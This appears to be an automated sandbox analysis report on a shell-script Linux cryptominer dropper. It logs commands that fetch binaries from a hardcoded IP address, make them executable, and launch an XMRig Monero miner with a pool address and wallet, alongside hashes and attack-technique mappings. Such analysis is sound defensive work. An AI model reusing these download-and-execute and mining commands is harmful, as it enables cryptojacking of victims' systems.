Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:53
Static task
static1
Behavioral task
behavioral1
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
-
Size
700B
-
MD5
c4d089011765cf8fa828d28b6eeeac3e
-
SHA1
43d933e706b0eefd0db2b5acba19205ebc1af2bd
-
SHA256
37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
-
SHA512
3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_xmrig behavioral2/files/fstream-1.dat xmrig -
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 766 chmod 784 chmod 864 chmod 842 chmod 850 chmod 859 chmod 765 chmod 792 chmod 820 chmod 834 chmod 841 chmod 849 chmod 865 chmod 874 chmod 805 chmod 812 chmod 821 chmod 825 chmod 813 chmod 833 chmod 875 chmod 879 chmod 767 chmod 791 chmod 799 chmod 800 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /.__min__c 771 .__min__c /.__min__ 773 .__min__ /.__min__ 786 .__min__ /.__min__c 793 .__min__c /.__min__c 801 .__min__c /.__min__ 807 .__min__ /.__min__c 814 .__min__c /.__min__c 822 .__min__c /.__min__ 827 .__min__ /.__min__c 835 .__min__c /.__min__c 843 .__min__c /.__min__c 851 .__min__c /.__min__ 861 .__min__ /.__min__c 866 .__min__c /.__min__c 876 .__min__c /.__min__ 881 .__min__ -
resource yara_rule behavioral2/files/fstream-2.dat upx -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/devices/system/cpu nproc -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl
Processes
-
/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh1⤵PID:656
-
/usr/bin/wgetwget 205.185.117.101/log2 -O /dev/null2⤵PID:657
-
-
/usr/bin/curlcurl -L 205.185.117.101/log2 -o /dev/null2⤵
- Checks CPU configuration
- Reads runtime system information
PID:677
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:684
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:763
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:764
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:765
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:766
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:767
-
-
/usr/bin/nprocnproc --all2⤵
- Enumerates kernel/hardware configuration
PID:768
-
-
/bin/hostnamehostname2⤵PID:770
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:771
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:776
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:777
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:780
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:784
-
-
/bin/hostnamehostname2⤵PID:785
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:786
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:788
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:791
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:792
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:795
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:796
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:799
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:800
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:803
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:804
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:805
-
-
/bin/hostnamehostname2⤵PID:806
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:807
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:809
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:812
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:813
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:814
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:816
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:817
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:820
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:821
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:822
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:824
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:825
-
-
/bin/hostnamehostname2⤵PID:826
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:829
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:831
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:833
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:834
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:835
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:837
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:838
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:841
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:842
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:845
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:846
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:849
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:850
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:853
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:854
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:859
-
-
/bin/hostnamehostname2⤵PID:860
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:861
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:863
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:864
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:865
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:868
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:869
-
-
/bin/chmodchmod +x /.__min__c2⤵
- File and Directory Permissions Modification
PID:874
-
-
/bin/chmodchmod +x /.__min__m2⤵
- File and Directory Permissions Modification
PID:875
-
-
/.__min__c/.__min__c2⤵
- Executes dropped EXE
PID:876
-
-
/usr/bin/wgetwget 205.185.117.101/__min__c -O /.__min__c2⤵PID:878
-
-
/bin/chmodchmod +x /.__min__2⤵
- File and Directory Permissions Modification
PID:879
-
-
/bin/hostnamehostname2⤵PID:880
-
-
/.__min__/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget 205.185.117.101/__min__ -O /.__min__2⤵PID:883
-
-
/usr/bin/wgetwget 205.185.117.101/__min__m -O /.__min__m2⤵PID:884
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.2MB
MD58f96e8b4e9d26884c776c1b42a70bae5
SHA153a4166052211abf77e1edf0d71c7a6faae12cc5
SHA2565e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
SHA5124709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec
-
Filesize
1.6MB
MD5d3e378df1f5f920faaf9ef9e14a54f55
SHA1b039ff3865762819392cec53eeac7c8ee0a630c3
SHA25658fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
SHA51240ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358
-
Filesize
2.9MB
MD5d98aa7684a42d8197b0eb2946c6d4fab
SHA1a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
SHA256bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
SHA512e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee